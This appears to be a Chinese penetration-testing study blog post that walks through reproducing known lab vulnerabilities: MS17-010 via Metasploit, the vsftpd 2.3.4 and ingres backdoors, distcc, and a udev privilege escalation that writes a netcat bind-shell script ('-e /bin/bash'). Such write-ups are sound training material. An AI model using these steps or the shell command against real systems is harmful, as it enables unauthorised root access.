内网渗透 day13-漏洞复现

漏洞复现

1. 永恒之蓝(445端口)

首先先搜索ms17_010

wps186

use 2   选择编号二的

wps187

查看需要的参数

wps188

设置目标ip地址

wps189

run   启动攻击成功

wps190

2. 手动微笑漏洞(21端口 vsftpd2.3.4版本)

扫描到对方打开21号端口并且版本为vsftpd 2.3.4的

wps191

ftp跟上目标机的ip地址,帐号为root:)  密码为root , 他就会停在那边

(或者search vsftpd直接利用漏洞)

wps192

重新开个终端用nc连接该ip地址的6200端口(成功连接,并且是root权限)

wps193

3. ingres数据库DBMS后门(1524端口)

扫描端口发现有1524端口的开放

wps194

直接telnet进行连接该ip的1524端口(直接获得root用户权限)

wps195

4. distcc漏洞(3632)

msf搜索distcc,并进入该模块

wps196

查看所要参数,并设置目标ip

wps197

启用失败(跟环境有关,靶机需要开启3632端口)

wps198

5. udev提权

searchsploit udev  +  locate        搜索加定位

wps199

进入shell

cat /proc/net/netlink -->记录udev pid

wps200

切换到/tmp文件下

wps201

touch run

echo '#!/bin/bash'> run

echo '/bin/netcat -Ivvp 4445 -e /bin/bash' >> run

wps202

将文件移动到/var/www/html文件夹下

wps203

下载并且编译gcc udev.c -0 udev

wps204

./udev pid

wps205

连接成功

wps206

posted @ 2020-11-11 11:28  彩虹猛犸  阅读(351)  评论(0编辑  收藏  举报